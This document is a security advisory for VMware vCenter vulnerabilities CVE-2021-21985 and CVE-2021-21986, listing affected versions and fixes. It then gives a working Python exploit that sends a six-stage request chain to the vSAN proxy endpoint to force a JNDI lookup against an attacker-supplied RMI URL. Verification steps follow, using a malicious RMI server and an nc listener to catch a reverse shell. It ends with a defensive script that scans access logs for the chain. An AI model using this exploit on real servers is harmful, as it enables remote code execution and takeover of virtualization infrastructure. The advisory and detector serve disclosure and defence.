Vulnerability details
On May 25, 2021, VMware published a security advisory disclosing a VMware vCenter Server remote code execution vulnerability (CVE-2021-21985) and a VMware vCenter Server plugin permission bypass vulnerability (CVE-2021-21986).
An attacker can craft malicious requests to achieve remote code execution through the Virtual SAN Health Check plugin, which is enabled by default in vCenter. Tencent Security experts remind VMware users to take security measures as soon as possible to block attacks exploiting this vulnerability.
VMware is a cloud infrastructure and mobile business solutions vendor that provides VMware-based virtualization solutions.
Affected versions
VMware vCenter Server 7.0 series < 7.0.U2b
VMware vCenter Server 6.7 series < 6.7.U3n
VMware vCenter Server 6.5 series < 6.5 U3p
VMware Cloud Foundation 4.x series < 4.2.1
VMware Cloud Foundation 3.x series < 3.10.2.1
Remediation
1. Upgrade VMware vCenter Server to the latest version.
2. For CVE-2021-21985 (VMware vCenter Server remote code execution), the workaround described at https://kb.vmware.com/s/article/83829 can be applied as a mitigation.
POC
import requests
import sys
import json

def send_request(host, uri, body):
    # baseuri and headers are module-level globals defined under __main__
    try:
        req = requests.post(url=host + baseuri + uri, json=body, headers=headers, verify=False)
        return req.text
    except requests.RequestException:
        return False

def check_false(request):
    # A failed request, or a reply without "result", means the proxy did not accept the call
    if request is False or 'result' not in request:
        print("[*] No Vuln!")
        return True
    return False

if __name__ == '__main__':
    # Both the target host and the payload URL are required
    if len(sys.argv) < 3:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    host = sys.argv[1]
    payload = sys.argv[2]
    baseuri = "/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    # Each stage is one POST to the proxy endpoint, sent in this order
    stages = [
        ("setTargetObject", "/setTargetObject", json.loads('{"methodInput":[null]}')),
        ("setStaticMethod", "/setStaticMethod", json.loads('{"methodInput":["javax.naming.InitialContext.doLookup"]}')),
        ("setTargetMethod", "/setTargetMethod", json.loads('{"methodInput":["doLookup"]}')),
        ("setArguments", "/setArguments", json.loads('{"methodInput":[["%s"]]}' % payload)),
        ("prepare", "/prepare", json.loads('{"methodInput":[]}')),
        ("invoke", "/invoke", json.loads('{"methodInput":[]}')),
    ]
    for name, uri, body in stages:
        print("[*] start %s" % name)
        resp = send_request(host, uri, body)
        # Check this step's own response before moving on to the next stage
        if check_false(resp):
            print("[*] %s failed!" % name)
            sys.exit()
Verification
1. Start the RMI service: java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
2. Start a reverse shell listener: nc -lvvp port
3. Run the payload to obtain a reverse shell.
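The request sequence above leaves a distinctive trace in the web server access log: six POSTs from one client to the vSAN proxy path, addressing a bean whose name starts with "&" (in Spring, that prefix dereferences the FactoryBean itself rather than the object it produces). As an added defender-side example that is not part of the advisory or the POC, the following Python scans access log lines for that pattern and reports which clients walked the full stage chain. The log format (combined log format) and the sample lines are constructed here; only the path prefix and stage names come from the POC.

```python
import re
from collections import defaultdict

# Proxy path prefix and stage endpoints, as used by the POC request sequence.
PROXY_PREFIX = "/ui/h5-vsan/rest/proxy/service/"
STAGES = ["setTargetObject", "setStaticMethod", "setTargetMethod",
          "setArguments", "prepare", "invoke"]

# Assumed combined log format: client ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign client, one client running the full chain, one partial probe.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/May/2021:10:00:01 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
] + [
    '203.0.113.5 - - [25/May/2021:10:00:0%d +0000] "POST %s&vsanQueryUtil_setDataService/%s HTTP/1.1" 200 40 "-" "pentest"'
    % (i + 2, PROXY_PREFIX, stage)
    for i, stage in enumerate(STAGES)
] + [
    '192.0.2.9 - - [25/May/2021:10:00:09 +0000] "POST %s&vsanQueryUtil_setDataService/setTargetObject HTTP/1.1" 200 40 "-" "curl/7.68.0"'
    % PROXY_PREFIX,
]


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(path):
    """Return (bean, stage) for a request to the vSAN proxy endpoint, else None."""
    if not path.startswith(PROXY_PREFIX):
        return None
    rest = path[len(PROXY_PREFIX):]
    bean, _, tail = rest.partition("/")
    stage = tail.split("?", 1)[0].split("/", 1)[0]
    return bean, stage


def analyze(lines):
    """Group proxy-endpoint hits per client and flag clients that completed the stage chain."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify_request(rec["path"])
        if hit is None:
            continue
        bean, stage = hit
        per_client[rec["client"]].append((bean, stage, rec["status"]))

    findings = {}
    for client, hits in per_client.items():
        seen = [stage for _, stage, _ in hits if stage in STAGES]
        findings[client] = {
            "hits": len(hits),
            "stages": seen,
            # All six stages observed from this client, regardless of interleaving
            "full_chain": all(stage in seen for stage in STAGES),
            # "&" prefix: the request addressed the FactoryBean itself
            "factory_bean_access": any(bean.startswith("&") for bean, _, _ in hits),
        }
    return findings


if __name__ == "__main__":
    for client, info in analyze(SAMPLE_LOG).items():
        print(client, info)
```

The path prefix alone is noisy on hosts where the vSAN UI is in legitimate use, so the stronger signals are the "&"-prefixed bean name and a client that touches all six stage endpoints; a client that only hits setTargetObject is reported but not flagged as a full chain.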